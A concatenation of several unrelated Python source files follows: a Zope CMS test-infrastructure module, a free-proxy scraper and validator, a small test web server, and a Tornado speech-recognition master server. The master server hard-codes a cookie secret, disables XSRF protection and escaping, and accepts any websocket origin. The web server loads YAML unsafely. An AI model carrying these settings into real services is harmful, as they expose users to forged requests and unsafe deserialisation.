source-ressorts file://{base}/content/ressorts.xml
source-keyword file://{base}/content/zeit-ontologie-prism.xml
source-products file://{base}/content/products.xml
source-badges file://{base}/asset/badges.xml
source-channels file://{base}/content/ressorts.xml
source-storystreams file://{base}/content/storystreams.xml
source-printressorts file://{base}/content/print-ressorts.xml
source-manual file://{base}/content/manual.xml
config-retractlog file://{base}/retractlog/retractlog.xml
checkout-lock-timeout 3600
checkout-lock-timeout-temporary 30
preview-prefix http://localhost/preview-prefix/
live-prefix http://localhost/live-prefix/
friebert-wc-preview-prefix /wcpreview
breadcrumbs-use-common-metadata true
cache-regions config, feature, newsimport, dav
cache-expiration-config 600
cache-expiration-feature 15
cache-expiration-newsimport 1
cache-expiration-dav 0
feature-toggle-source file://{base}/content/feature-toggle.xml
sso-cookie-name-prefix my_sso_
sso-cookie-domain
sso-expiration 300
sso-algorithm RS256
sso-private-key-file {base}/tests/sso-private.pem
source-api-mapping product=zeit.cms.content.sources.ProductSource
# We just need a dummy XML file
checkin-webhook-config file://{base}/content/access.xml
</product-config>
""".format(
base=pkg_resources.resource_filename(__name__, ''))
CONFIG_LAYER = ProductConfigLayer(cms_product_config)
ZCML_LAYER = ZCMLLayer('ftesting.zcml', bases=(CONFIG_LAYER,))
ZOPE_LAYER = ZopeLayer(bases=(ZCML_LAYER,))
WSGI_LAYER = WSGILayer(bases=(ZOPE_LAYER,))
# Layer API modelled after gocept.httpserverlayer.wsgi
class WSGIServerLayer(plone.testing.Layer):
port = 0 # choose automatically
def __init__(self, *args, **kw):
super(WSGIServerLayer, self).__init__(*args, **kw)
self.wsgi_app = None
@property
def wsgi_app(self):
return self.get('wsgi_app', self._wsgi_app)
@wsgi_app.setter
def wsgi_app(self, value):
self._wsgi_app = value
@property
def host(self):
return os.environ.get('GOCEPT_HTTP_APP_HOST', 'localhost')
def setUp(self):
self['httpd'] = waitress.server.create_server(
self.wsgi_app, host=self.host, port=0, ipv6=False,
clear_untrusted_proxy_headers=True)
if isinstance(self['httpd'], waitress.server.MultiSocketServer):
self['http_host'] = self['httpd'].effective_listen[0][0]
self['http_port'] = self['httpd'].effective_listen[0][1]
else:
self['http_host'] = self['httpd'].effective_host
self['http_port'] = self['httpd'].effective_port
self['http_address'] = '%s:%s' % (self['http_host'], self['http_port'])
self['httpd_thread'] = threading.Thread(target=self['httpd'].run)
self['httpd_thread'].daemon = True
self['httpd_thread'].start()
def tearDown(self):
self['httpd'].close()
self['httpd_thread'].join(5)
if self['httpd_thread'].is_alive():
raise RuntimeError('WSGI server could not be shut down')
del self['httpd']
del self['httpd_thread']
del self['http_host']
del self['http_port']
del self['http_address']
HTTP_LAYER = WSGIServerLayer(name='HTTPLayer', bases=(WSGI_LAYER,))
class WebdriverLayer(gocept.selenium.WebdriverLayer):
# copy&paste from superclass to customize the ff binary, and to note that
# chrome indeed does support non-headless now.
def _start_selenium(self):
if self._browser == 'firefox':
options = selenium.webdriver.FirefoxOptions()
# The default 'info' is still way too verbose
options.log.level = 'error'
if self.headless:
options.add_argument('-headless')
options.binary = os.environ.get('GOCEPT_WEBDRIVER_FF_BINARY')
self['seleniumrc'] = selenium.webdriver.Firefox(
firefox_profile=self.profile, options=options)
if self._browser == 'chrome':
options = selenium.webdriver.ChromeOptions()
if self.headless:
options.add_argument('--headless')
self['seleniumrc'] = selenium.webdriver.Chrome(
options=options,
service_args=['--log-path=chromedriver.log'])
WD_LAYER = WebdriverLayer(name='WebdriverLayer', bases=(HTTP_LAYER,))
WEBDRIVER_LAYER = gocept.selenium.WebdriverSeleneseLayer(
name='WebdriverSeleneseLayer', bases=(WD_LAYER,))
# XXX Hopefully not necessary once we're on py3
class OutputChecker(zope.testing.renormalizing.RENormalizing):
string_prefix = re.compile(r"(\W|^)[uUbB]([rR]?[\'\"])", re.UNICODE)
# Strip out u'' and b'' literals, adapted from
# <https://stackoverflow.com/a/56507895>.
def remove_string_prefix(self, want, got):
return (re.sub(self.string_prefix, r'\1\2', want),
re.sub(self.string_prefix, r'\1\2', got))
def check_output(self, want, got, optionflags):
# `want` is already unicode, since we pass `encoding` to DocFileSuite.
if not isinstance(got, six.text_type):
got = got.decode('utf-8')
want, got = self.remove_string_prefix(want, got)
super_ = zope.testing.renormalizing.RENormalizing
return super_.check_output(self, want, got, optionflags)
def output_difference(self, example, got, optionflags):
if not isinstance(got, six.text_type):
got = got.decode('utf-8')
example.want, got = self.remove_string_prefix(example.want, got)
super_ = zope.testing.renormalizing.RENormalizing
return super_.output_difference(self, example, got, optionflags)
checker = OutputChecker([
(re.compile(r'\d{4} \d{1,2} \d{1,2} \d\d:\d\d:\d\d'), '<FORMATTED DATE>'),
(re.compile('0x[0-9a-f]+'), "0x..."),
(re.compile(r'/\+\+noop\+\+[0-9a-f]+'), ''),
(re.compile(
'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'),
"<GUID>"),
])
def remove_exception_module(msg):
"""Copy&paste so we keep the exception message and support multi-line."""
start, end = 0, len(msg)
name_end = msg.find(':', 0, end)
i = msg.rfind('.', 0, name_end)
if i >= 0:
start = i + 1
return msg[start:end]
if sys.version_info > (3,):
doctest._strip_exception_details = remove_exception_module
optionflags = (doctest.REPORT_NDIFF +
doctest.NORMALIZE_WHITESPACE +
doctest.ELLIPSIS +
doctest.IGNORE_EXCEPTION_DETAIL)
def DocFileSuite(*paths, **kw):
kw['package'] = doctest._normalize_module(kw.get('package'))
kw.setdefault('checker', checker)
kw.setdefault('optionflags', optionflags)
kw['encoding'] = 'utf-8'
return doctest.DocFileSuite(*paths, **kw)
def FunctionalDocFileSuite(*paths, **kw):
layer = kw.pop('layer', WSGI_LAYER)
kw['package'] = doctest._normalize_module(kw.get('package'))
globs = kw.setdefault('globs', {})
globs['getRootFolder'] = lambda: layer['zodbApp']
globs['layer'] = layer
kw.setdefault('checker', checker)
kw.setdefault('optionflags', optionflags)
kw['encoding'] = 'utf-8'
test = doctest.DocFileSuite(*paths, **kw)
test.layer = layer
return test
class RepositoryHelper(object):
@property
def repository(self):
import zeit.cms.repository.interfaces
with site(self.getRootFolder()):
return zope.component.getUtility(
zeit.cms.repository.interfaces.IRepository)
@repository.setter
def repository(self, value):
self.__dict__['repository'] = value
class FunctionalTestCase(
unittest.TestCase,
gocept.testing.assertion.Ellipsis,
gocept.testing.assertion.Exceptions,
gocept.testing.assertion.String,
RepositoryHelper):
def getRootFolder(self):
"""Returns the Zope root folder."""
return self.layer['zodbApp']
def setUp(self):
super(FunctionalTestCase, self).setUp()
zope.component.hooks.setSite(self.getRootFolder())
self.principal = create_interaction(u'zope.user')
# XXX We should subclass instead of monkey-patch, but then I'd have
# to change all the layer declarations in the zeit.* packages, sigh.
def selenium_setup_authcache(self):
# NOTE: Massively kludgy workaround. It seems that Firefox has a timing
# issue with HTTP auth and AJAX calls: if you open a page that requires
# auth and has AJAX calls to further pages that require the same auth,
# sometimes those AJAX calls come back as 401 (nothing to do with
# Selenium, we've seen this against the actual server).
#
# It seems that opening a page and then giving it a little time
# to settle in is enough to work around this issue.
original_setup(self)
s = self['selenium']
self['http_auth_cache'] = True
# XXX It seems something is not ready immediately?!??
s.pause(1000)
# XXX Credentials are duplicated from SeleniumTestCase.open().
s.open('http://user:userpw@%s/++skin++vivi/@@test-setup-auth'
% self['http_address'])
# We don't really know how much time the browser needs until it's
# satisfied, or how we could determine this.
s.pause(1000)
original_setup = gocept.selenium.webdriver.WebdriverSeleneseLayer.setUp
gocept.selenium.webdriver.WebdriverSeleneseLayer.setUp = (
selenium_setup_authcache)
def selenium_teardown_authcache(self):
original_teardown(self)
del self['http_auth_cache']
original_teardown = gocept.selenium.webdriver.WebdriverSeleneseLayer.tearDown
gocept.selenium.webdriver.WebdriverSeleneseLayer.tearDown = (
selenium_teardown_authcache)
@pytest.mark.selenium
class SeleniumTestCase(gocept.selenium.WebdriverSeleneseTestCase,
FunctionalTestCase):
skin = 'cms'
log_errors = False
log_errors_ignore = ()
level = 2
TIMEOUT = int(os.environ.get('ZEIT_SELENIUM_TIMEOUT', 10))
window_width = 1100
window_height = 600
def setUp(self):
super(SeleniumTestCase, self).setUp()
self.layer['selenium'].setTimeout(self.TIMEOUT * 1000)
if self.log_errors:
error_log = zope.component.getUtility(
zope.error.interfaces.IErrorReportingUtility)
error_log.copy_to_zlog = True
error_log._ignored_exceptions = self.log_errors_ignore
self.log_handler = logging.StreamHandler(sys.stdout)
logging.root.addHandler(self.log_handler)
self.old_log_level = logging.root.level
logging.root.setLevel(logging.WARN)
transaction.commit()
self.original_windows = set(self.selenium.getAllWindowIds())
self.original_width = self.selenium.getEval('window.outerWidth')
self.original_height = self.selenium.getEval('window.outerHeight')
self.selenium.setWindowSize(self.window_width, self.window_height)
self.execute('window.localStorage.clear()')
def tearDown(self):
super(SeleniumTestCase, self).tearDown()
if self.log_errors:
logging.root.removeHandler(self.log_handler)
logging.root.setLevel(self.old_log_level)
current_windows = set(self.selenium.getAllWindowIds())
for window in current_windows - self.original_windows:
self.selenium.selectWindow(window)
self.selenium.close()
self.selenium.selectWindow()
self.selenium.setWindowSize(self.original_width, self.original_height)
# open a neutral page to stop all pending AJAX requests
self.open('/@@test-setup-auth')
def open(self, path, auth='user:userpw'):
if auth:
auth += '@'
self.selenium.open(
'http://%s%s/++skin++%s%s' % (
auth, self.selenium.server, self.skin, path))
def click_label(self, label):
self.selenium.click('//label[contains(string(.), %s)]' %
xml.sax.saxutils.quoteattr(label))
js_globals = """\
var document = window.document;
var zeit = window.zeit;
"""
def execute(self, text):
return self.selenium.selenium.execute_script(self.js_globals + text)
def eval(self, text):
return self.execute('return ' + text)
def wait_for_condition(self, text):
self.selenium.waitForCondition(self.js_globals + """\
return Boolean(%s);
""" % text)
def wait_for_dotted_name(self, dotted_name):
partial = []
for part in dotted_name.split('.'):
partial.append(part)
self.wait_for_condition('.'.join(partial))
def add_by_autocomplete(self, text, widget):
s = self.selenium
s.type(widget, text)
autocomplete_item = 'css=.ui-menu-item a'
s.waitForElementPresent(autocomplete_item)
s.waitForVisible(autocomplete_item)
s.click(autocomplete_item)
s.waitForNotVisible('css=.ui-menu')
def click_wo_redirect(browser, *args, **kwargs):
browser.follow_redirects = False
try:
browser.getLink(*args, **kwargs).click()
print((browser.headers['Status']))
print((browser.headers['Location']))
finally:
browser.follow_redirects = True
def set_site(site=None):
"""Encapsulation of the getSite/setSite-dance, with doctest support."""
globs = sys._getframe(1).f_locals
if site is None:
site = globs['getRootFolder']()
zope.component.hooks.setSite(site)
# XXX use zope.publisher.testing for the following two
def create_interaction(name='zope.user'):
name = six.text_type(name) # XXX At least zope.dublincore requires unicode
principal = zope.security.testing.Principal(
name, groups=['zope.Authenticated'], description=u'test@example.com')
request = zope.publisher.browser.TestRequest()
request.setPrincipal(principal)
zope.security.management.newInteraction(request)
return principal
@contextlib.contextmanager
def interaction(principal_id=u'zope.user'):
if zope.security.management.queryInteraction():
# There already is an interaction. Great. Leave it alone.
yield
else:
principal = create_interaction(principal_id)
yield principal
zope.security.management.endInteraction()
# XXX use zope.component.testing.site instead
@contextlib.contextmanager
def site(root):
old_site = zope.component.hooks.getSite()
zope.component.hooks.setSite(root)
yield
zope.component.hooks.setSite(old_site)
@zope.interface.implementer(zope.i18n.interfaces.IGlobalMessageCatalog)
class TestCatalog(object):
language = 'tt'
messages = {}
def queryMessage(self, msgid, default=None):
return self.messages.get(msgid, default)
getMessage = queryMessage
def getIdentifier(self):
return 'test'
def reload(self):
pass
def copy_inherited_functions(base, locals):
"""py.test annotates the test function object with data, e.g. required
fixtures. Normal inheritance means that there is only *one* function object
(in the base class), which means for example that subclasses cannot specify
different layers, since they would all aggregate on that one function
object, which would be completely wrong.
Usage: copy_inherited_functions(BaseClass, locals())
"""
def make_delegate(name):
def delegate(self):
return getattr(super(type(self), self), name)()
return delegate
for name in dir(base):
if not name.startswith('test_'):
continue
locals[name] = make_delegate(name)
class BrowserAssertions(gocept.testing.assertion.Ellipsis):
# XXX backwards-compat method signature for existing tests, should probably
# be removed at some point
def assert_ellipsis(self, want, got=None):
if got is None:
got = self.browser.contents
self.assertEllipsis(want, got)
def assert_json(self, want, got=None):
if got is None:
got = self.browser.contents
data = json.loads(got)
self.assertEqual(want, data)
return data
class Browser(zope.testbrowser.browser.Browser):
follow_redirects = True
xml_strict = False
def __init__(self, wsgi_app):
super(Browser, self).__init__(wsgi_app=wsgi_app)
def login(self, username, password):
auth = base64.b64encode(
('%s:%s' % (username, password)).encode('utf-8'))
if sys.version_info > (3,):
auth = auth.decode('ascii')
self.addHeader('Authorization', 'Basic %s' % auth)
def reload(self):
# Don't know what the superclass is doing here, exactly, but it's not
# helpful at all, so we reimplement it in a hopefully more sane way.
if self._response is None:
raise zope.testbrowser.browser.BrowserStateError(
'No URL has yet been .open()ed')
self.open(self.url)
def _processRequest(self, url, make_request):
self._document = None
transaction.commit()
old_site = zope.component.hooks.getSite()
zope.component.hooks.setSite(None)
old_interaction = zope.security.management.queryInteraction()
zope.security.management.endInteraction()
try:
# No super call, since we had to copy&paste the whole method.
self._do_processRequest(url, make_request)
finally:
zope.component.hooks.setSite(old_site)
if old_interaction:
zope.security.management.thread_local.interaction = (
old_interaction)
# copy&paste from superclass _processRequest to plug in `follow_redirects`
def _do_processRequest(self, url, make_request):
with self._preparedRequest(url) as reqargs:
self._history.add(self._response)
resp = make_request(reqargs)
if self.follow_redirects:
remaining_redirects = 100 # infinite loops protection
while (remaining_redirects and
resp.status_int in zope.testbrowser.browser.REDIRECTS):
remaining_redirects -= 1
url = urljoin(url, resp.headers['location'])
with self._preparedRequest(url) as reqargs:
resp = self.testapp.get(url, **reqargs)
assert remaining_redirects > 0, "redirect chain looks infinite"
self._setResponse(resp)
self._checkStatus()
HTML_PARSER = lxml.html.HTMLParser(encoding='UTF-8')
_document = None
@property
def document(self):
"""Return an lxml.html.HtmlElement instance of the response body."""
if self._document is not None:
return self._document
if self.contents is not None:
if self.xml_strict:
self._document = lxml.etree.fromstring(self.contents)
else:
self._document = lxml.html.document_fromstring(
self.contents, parser=self.HTML_PARSER)
return self._document
def xpath(self, selector, **kw):
"""Return a list of lxml.HTMLElement instances that match a given
XPath selector.
"""
if self.document is not None:
return self.document.xpath(selector, **kw)
# Allow webtest to handle file download result iterators
webtest.lint.isinstance = zope.security.proxy.isinstance
class BrowserTestCase(FunctionalTestCase, BrowserAssertions):
login_as = ('user', 'userpw')
def setUp(self):
super(BrowserTestCase, self).setUp()
self.browser = Browser(self.layer['wsgi_app'])
if isinstance(self.login_as, six.string_types): # BBB:
self.login_as = self.login_as.split(':')
self.browser.login(*self.login_as)
# These ugly names are due to two reasons:
# 1. zeit.cms.testing contains both general test mechanics *and*
# specific test infrastructure/layers for zeit.cms itself
# 2. pytest does not allow for subclassing a TestCase and changing its layer
# (for the same reason as copy_inherited_functions above).
class ZeitCmsTestCase(FunctionalTestCase):
layer = ZOPE_LAYER
class ZeitCmsBrowserTestCase(BrowserTestCase):
layer = WSGI_LAYER
class JSLintTestCase(gocept.jslint.TestCase):
jshint_command = os.environ.get('JSHINT_COMMAND', '/bin/true')
options = {
'esversion': '6',
'evil': True,
'eqnull': True,
'multistr': True,
'sub': True,
'undef': True,
'browser': True,
'jquery': True,
'devel': True,
}
predefined = (
'zeit', 'gocept',
'application_url', 'context_url',
'DOMParser', 'escape', 'unescape',
'jsontemplate',
'MochiKit', '$$', 'forEach', 'filter', 'map', 'extend', 'bind',
'log', 'repr', 'logger', 'logDebug', 'logError', # XXX
'DIV', 'A', 'UL', 'LI', 'INPUT', 'IMG', 'SELECT', 'OPTION', 'BUTTON',
'SPAN', 'LABEL',
'isNull', 'isUndefined', 'isUndefinedOrNull',
'Uri',
'_', # js.underscore
)
ignore = (
"Functions declared within loops",
"Expected an identifier and instead saw 'import'",
"Use '===' to compare with",
"Use '!==' to compare with",
"Missing radix parameter",
"Misleading line break",
"Expected an assignment or function call and instead"
" saw an expression",
)
def _write_config_file(self):
"""Copy&paste from baseclass, so we can use non-boolean options."""
settings = self.options.copy()
predefined = settings['predef'] = []
for name in self.predefined:
predefined.append(name)
handle, filename = tempfile.mkstemp()
output = open(filename, 'w')
json.dump(settings, output)
output.close()
return filename
original = datetime.datetime
class FreezeMeta(type):
def __instancecheck__(self, instance):
if type(instance) == original or type(instance) == Freeze:
return True
class Freeze(six.with_metaclass(FreezeMeta, datetime.datetime)):
@classmethod
def freeze(cls, val):
cls.frozen = val
@classmethod
def now(cls, tz=None):
if tz is not None:
if cls.frozen.tzinfo is None:
# https://docs.python.org/2/library/datetime.html says,
# the result is equivalent to tz.fromutc(
# datetime.utcnow().replace(tzinfo=tz)).
return tz.fromutc(cls.frozen.replace(tzinfo=tz))
else:
return cls.frozen.astimezone(tz)
return cls.frozen
@classmethod
def today(cls, tz=None):
return Freeze.now(tz)
@classmethod
def delta(cls, timedelta=None, **kwargs):
""" Moves time fwd/bwd by the delta"""
if not timedelta:
timedelta = datetime.timedelta(**kwargs)
cls.frozen += timedelta
@contextlib.contextmanager
def clock(dt=None):
if dt is None:
dt = original.utcnow()
with mock.patch('datetime.datetime', Freeze):
Freeze.freeze(dt)
yield Freeze
def xmltotext(xml):
return lxml.etree.tostring(xml, pretty_print=True, encoding=six.text_type)
|
test.py
|
# -*- coding: utf-8 -*-
import urllib.request
import urllib
import re
import time
import random
import socket
import threading
import requests
# 抓取代理IP
ip_totle = []
for page in range(2, 6):
# url = 'http://ip84.com/dlgn/' + str(page)
url = 'http://www.xicidaili.com/wn/' + str(page) # 西刺代理
# url = "https://www.kuaidaili.com/free/inha/"+str(page)
# headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64)"}
headers = {'Accept-Encoding': 'gzip',
'Host': 'www.xicidaili.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}
# request = urllib.request.Request(url=url, headers=headers)
# response = urllib.request.urlopen(request)
# content = response.read().decode('utf-8')
req = requests.get(url=url, headers=headers)
content = req.text
print('get page', page)
pattern = re.compile('<td>(\d.*?)</td>') # 截取<td>与</td>之间第一个数为数字的内容
ip_page = re.findall(pattern, str(content))
ip_totle.extend(ip_page)
time.sleep(random.choice(range(1, 3)))
# 打印抓取内容
print('代理IP地址 ', '\t', '端口', '\t', '速度', '\t', '验证时间')
for i in range(0, len(ip_totle), 4):
print(ip_totle[i], ' ', '\t', ip_totle[i + 1], '\t', ip_totle[i + 2], '\t', ip_totle[i + 3])
# 整理代理IP格式
proxys = []
for i in range(0, len(ip_totle), 4):
proxy_host = ip_totle[i] + ':' + ip_totle[i + 1]
proxy_temp = {"https": proxy_host}
proxys.append(proxy_temp)
proxy_ip = open('proxy_ip_baidu.txt', 'w') # 新建一个储存有效IP的文档
lock = threading.Lock() # 建立一个锁
# 验证代理IP有效性的方法
def test(i):
socket.setdefaulttimeout(10) # 设置全局超时时间
url = "https://www.baidu.com/" # 打算爬取的网址 https://fanyi.baidu.com/transapi https://www.javatpoint.com
try:
proxy_support = urllib.request.ProxyHandler(proxys[i])
opener = urllib.request.build_opener(proxy_support)
opener.addheaders = [("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64)")]
urllib.request.install_opener(opener)
res = urllib.request.urlopen(url).read()
lock.acquire() # 获得锁
print(proxys[i], 'is OK')
proxy_ip.write('%s\n' % str(proxys[i])) # 写入该代理IP
lock.release() # 释放锁
except Exception as e:
lock.acquire()
print(proxys[i], e)
lock.release()
# 单线程验证
'''for i in range(len(proxys)):
test(i)'''
# 多线程验证
threads = []
for i in range(len(proxys)):
thread = threading.Thread(target=test, args=[i])
threads.append(thread)
thread.start()
# 阻塞主进程,等待所有子线程结束
for thread in threads:
thread.join()
proxy_ip.close() # 关闭文件
proxy_ip
|
serve.py
|
#
# A simple webserver MEANT FOR TESTING based off of http.server.
#
import http.server
import socketserver
import os
from multiprocessing import Process
import generate
import yaml
from threading import Timer
# Credit: http://stackoverflow.com/a/13151299/6388442
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
def serve(PORT=80, SERVE="."):
# Declare the processes
serveProcess = Process(target=rawServe, args=[PORT, SERVE])
genProcess = Process(target=autoGen)
serveProcess.start()
genProcess.start()
def rawServe(PORT, SERVE):
print("rawServe started.")
web_dir = os.path.join(os.path.dirname(__file__), SERVE)
os.chdir(web_dir)
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("Serving at port: ", PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("^C: Ending rawServe...")
def autoGen():
print("AutoGen started.")
print("Loading config...")
config = yaml.load(open("config/painless.yml", "r").read())
print("Setting timer...")
rt = RepeatedTimer(config["options"]["reloadTime"], generate.generate, config["options"]["outputDirectory"]) # Auto-starts
|
master_server.py
|
#!/usr/bin/env python
#
# Copyright 2013 Tanel Alumae
"""
Reads speech data via websocket requests, sends it to Redis, waits for results from Redis and
forwards to client via websocket
"""
import sys
import logging
import json
import codecs
import os.path
import uuid
import time
import threading
import functools
from Queue import Queue
import tornado.ioloop
import tornado.options
import tornado.web
import tornado.websocket
import tornado.gen
import tornado.concurrent
import settings
import common
import os
if os.environ.get('WSS'):
import ssl
class Application(tornado.web.Application):
def __init__(self):
settings = dict(
cookie_secret="43oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=",
template_path=os.path.join(os.path.dirname(os.path.dirname(__file__)), "templates"),
static_path=os.path.join(os.path.dirname(os.path.dirname(__file__)), "static"),
xsrf_cookies=False,
autoescape=None,
)
handlers = [
(r"/", MainHandler),
(r"/client/ws/speech", DecoderSocketHandler),
(r"/client/ws/status", StatusSocketHandler),
(r"/client/dynamic/reference", ReferenceHandler),
(r"/client/dynamic/recognize", HttpChunkedRecognizeHandler),
(r"/worker/ws/speech", WorkerSocketHandler),
(r"/client/static/(.*)", tornado.web.StaticFileHandler, {'path': settings["static_path"]}),
]
tornado.web.Application.__init__(self, handlers, **settings)
self.available_workers = set()
self.status_listeners = set()
self.num_requests_processed = 0
def send_status_update_single(self, ws):
status = dict(num_workers_available=len(self.available_workers), num_requests_processed=self.num_requests_processed)
ws.write_message(json.dumps(status))
def send_status_update(self):
for ws in self.status_listeners:
self.send_status_update_single(ws)
def save_reference(self, content_id, content):
refs = {}
try:
with open("reference-content.json") as f:
refs = json.load(f)
except:
pass
refs[content_id] = content
with open("reference-content.json", "w") as f:
json.dump(refs, f, indent=2)
class MainHandler(tornado.web.RequestHandler):
def get(self):
current_directory = os.path.dirname(os.path.abspath(__file__))
parent_directory = os.path.join(current_directory, os.pardir)
readme = os.path.join(parent_directory, "README.md")
self.render(readme)
def run_async(func):
@functools.wraps(func)
def async_func(*args, **kwargs):
func_hl = threading.Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
def content_type_to_caps(content_type):
"""
Converts MIME-style raw audio content type specifier to GStreamer CAPS string
"""
default_attributes= {"rate": 16000, "format" : "S16LE", "channels" : 1, "layout" : "interleaved"}
media_type, _, attr_string = content_type.replace(";", ",").partition(",")
if media_type in ["audio/x-raw", "audio/x-raw-int"]:
media_type = "audio/x-raw"
attributes = default_attributes
for (key,_,value) in [p.partition("=") for p in attr_string.split(",")]:
attributes[key.strip()] = value.strip()
return "%s, %s" % (media_type, ", ".join(["%s=%s" % (key, value) for (key,value) in attributes.iteritems()]))
else:
return content_type
@tornado.web.stream_request_body
class HttpChunkedRecognizeHandler(tornado.web.RequestHandler):
"""
Provides a HTTP POST/PUT interface supporting chunked transfer requests, similar to that provided by
http://github.com/alumae/ruby-pocketsphinx-server.
"""
def prepare(self):
self.id = str(uuid.uuid4())
self.final_hyp = ""
self.final_result_queue = Queue()
self.user_id = self.request.headers.get("device-id", "none")
self.content_id = self.request.headers.get("content-id", "none")
logging.info("%s: OPEN: user='%s', content='%s'" % (self.id, self.user_id, self.content_id))
self.worker = None
self.error_status = 0
self.error_message = None
try:
self.worker = self.application.available_workers.pop()
self.application.send_status_update()
logging.info("%s: Using worker %s" % (self.id, self.__str__()))
self.worker.set_client_socket(self)
content_type = self.request.headers.get("Content-Type", None)
if content_type:
content_type = content_type_to_caps(content_type)
logging.info("%s: Using content type: %s" % (self.id, content_type))
self.worker.write_message(json.dumps(dict(id=self.id, content_type=content_type, user_id=self.user_id, content_id=self.content_id)))
except KeyError:
logging.warn("%s: No worker available for client request" % self.id)
self.set_status(503)
self.finish("No workers available")
def data_received(self, chunk):
assert self.worker is not None
logging.debug("%s: Forwarding client message of length %d to worker" % (self.id, len(chunk)))
self.worker.write_message(chunk, binary=True)
def post(self, *args, **kwargs):
self.end_request(args, kwargs)
def put(self, *args, **kwargs):
self.end_request(args, kwargs)
@run_async
def get_final_hyp(self, callback=None):
logging.info("%s: Waiting for final result..." % self.id)
callback(self.final_result_queue.get(block=True))
@tornado.web.asynchronous
@tornado.gen.coroutine
def end_request(self, *args, **kwargs):
logging.info("%s: Handling the end of chunked recognize request" % self.id)
assert self.worker is not None
self.worker.write_message("EOS", binary=True)
logging.info("%s: yielding..." % self.id)
hyp = yield tornado.gen.Task(self.get_final_hyp)
if self.error_status == 0:
logging.info("%s: Final hyp: %s" % (self.id, hyp))
response = {"status" : 0, "id": self.id, "hypotheses": [{"utterance" : hyp}]}
self.write(response)
else:
logging.info("%s: Error (status=%d) processing HTTP request: %s" % (self.id, self.error_status, self.error_message))
response = {"status" : self.error_status, "id": self.id, "message": self.error_message}
self.write(response)
self.application.num_requests_processed += 1
self.application.send_status_update()
self.worker.set_client_socket(None)
self.worker.close()
self.finish()
logging.info("Everything done")
def send_event(self, event):
event_str = str(event)
if len(event_str) > 100:
event_str = event_str[:97] + "..."
logging.info("%s: Receiving event %s from worker" % (self.id, event_str))
if event["status"] == 0 and ("result" in event):
try:
if len(event["result"]["hypotheses"]) > 0 and event["result"]["final"]:
if len(self.final_hyp) > 0:
self.final_hyp += " "
self.final_hyp += event["result"]["hypotheses"][0]["transcript"]
except:
e = sys.exc_info()[0]
logging.warn("Failed to extract hypothesis from recognition result:" + e)
elif event["status"] != 0:
self.error_status = event["status"]
self.error_message = event.get("message", "")
def close(self):
logging.info("%s: Receiving 'close' from worker" % (self.id))
self.final_result_queue.put(self.final_hyp)
class ReferenceHandler(tornado.web.RequestHandler):
def post(self, *args, **kwargs):
content_id = self.request.headers.get("Content-Id")
if content_id:
content = codecs.decode(self.request.body, "utf-8")
user_id = self.request.headers.get("User-Id", "")
self.application.save_reference(content_id, dict(content=content, user_id=user_id, time=time.strftime("%Y-%m-%dT%H:%M:%S")))
logging.info("Received reference text for content %s and user %s" % (content_id, user_id))
self.set_header('Access-Control-Allow-Origin', '*')
else:
self.set_status(400)
self.finish("No Content-Id specified")
def options(self, *args, **kwargs):
self.set_header('Access-Control-Allow-Origin', '*')
self.set_header('Access-Control-Allow-Methods', 'POST, OPTIONS')
self.set_header('Access-Control-Max-Age', 1000)
# note that '*' is not valid for Access-Control-Allow-Headers
self.set_header('Access-Control-Allow-Headers', 'origin, x-csrftoken, content-type, accept, User-Id, Content-Id')
class StatusSocketHandler(tornado.websocket.WebSocketHandler):
# needed for Tornado 4.0
def check_origin(self, origin):
return True
def open(self):
logging.info("New status listener")
self.application.status_listeners.add(self)
self.application.send_status_update_single(self)
def on_close(self):
logging.info("Status listener left")
self.application.status_listeners.remove(self)
class WorkerSocketHandler(tornado.websocket.WebSocketHandler):
def __init__(self, application, request, **kwargs):
tornado.websocket.WebSocketHandler.__init__(self, application, request, **kwargs)
self.client_socket = None
# needed for Tornado 4.0
def check_origin(self, origin):
return True
def open(self):
self.client_socket = None
self.application.available_workers.add(self)
logging.info("New worker available " + self.__str__())
self.application.send_status_update()
def on_close(self):
logging.info("Worker " + self.__str__() + " leaving")
self.application.available_workers.discard(self)
if self.client_socket:
self.client_socket.close()
self.application.send_status_update()
def on_message(self, message):
assert self.client_socket is not None
event = json.loads(message)
self.client_socket.send_event(event)
def set_client_socket(self, client_socket):
self.client_socket = client_socket
class DecoderSocketHandler(tornado.websocket.WebSocketHandler):
# needed for Tornado 4.0
def check_origin(self, origin):
return True
def send_event(self, event):
event["id"] = self.id
event_str = str(event)
if len(event_str) > 100:
event_str = event_str[:97] + "..."
logging.info("%s: Sending event %s to client" % (self.id, event_str))
self.write_message(json.dumps(event))
def open(self):
self.id = str(uuid.uuid4())
logging.info("%s: OPEN" % (self.id))
logging.info("%s: Request arguments: %s" % (self.id, " ".join(["%s=\"%s\"" % (a, self.get_argument(a)) for a in self.request.arguments])))
self.user_id = self.get_argument("user-id", "none", True)
self.content_id = self.get_argument("content-id", "none", True)
self.worker = None
try:
self.worker = self.application.available_workers.pop()
self.application.send_status_update()
logging.info("%s: Using worker %s" % (self.id, self.__str__()))
self.worker.set_client_socket(self)
content_type = self.get_argument("content-type", None, True)
if content_type:
logging.info("%s: Using content type: %s" % (self.id, content_type))
self.worker.write_message(json.dumps(dict(id=self.id, content_type=content_type, user_id=self.user_id, content_id=self.content_id)))
except KeyError:
logging.warn("%s: No worker available for client request" % self.id)
event = dict(status=common.STATUS_NOT_AVAILABLE, message="No decoder available, try again later")
self.send_event(event)
self.close()
def on_connection_close(self):
logging.info("%s: Handling on_connection_close()" % self.id)
self.application.num_requests_processed += 1
